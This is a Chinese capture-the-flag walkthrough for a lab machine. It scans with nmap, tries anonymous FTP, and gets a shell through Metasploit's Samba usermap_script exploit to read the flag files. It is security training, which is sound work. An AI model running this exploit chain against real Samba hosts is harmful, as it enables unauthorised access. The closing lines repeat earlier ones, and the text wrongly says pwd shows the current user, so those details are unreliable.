10.10.10.3
该题用到 nmap、Metasploit
我拿到IP的第一个思路就是用nmap跑一下,-sC表示用脚本扫描,扫描后发现以下21、22、445端口,还发现21端口开着ftp服务,并且显示 FTP login allowed,继续往下看
发现Samba版本信息,3.X-4.X
(扫描脚本有地方报错,,暂时不管~)
扫描结果分析完后,尝试刚刚发现的ftp allowed 服务
命令 ftp 10.10.10.3 连接成功
命令 open10.10.10.3
默认的用户名 ftp 密码 ftp
ls 查看ftp里面装有哪些东东~
好像没有......所以命令 bye
刚刚还发现了Samba 的版本信息,用searchsploit samba 3命令查找samba 3 版本有哪些Exploit (searchsploit命令块)
补充:Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源
在exploit里面发现了samba 3的’Username‘map script'Command Execution .....命令执行漏洞
msfconsole 进入Metasploit
search samba 在Metasploit里面搜索有没有刚发现的samba的命令执行漏洞,列表中已经存在该漏洞的脚本
use exploit/multi/samba/usermap_script 选择使用漏洞模块
show options 列出该漏洞模块下的设置
RHOSTS
set RHOSTS 10.10.10.3 设置攻击目标的IP地址
exploit 执行
[
成功进入主机
ls看看目录
pwd查看当前为什么用户
cd ~ 到home目录下
ls
发现 root.txt
cat root.txt
得到第一个flag
cd /home 到普通用户的home目录下
ls -l 查看该目录下的文件及其类型
cd user没有东西
cd makies 发现 user.txt
cat user.txt
get flag!
其类型
cd user没有东西
cd makies 发现 user.txt
cat user.txt
get flag!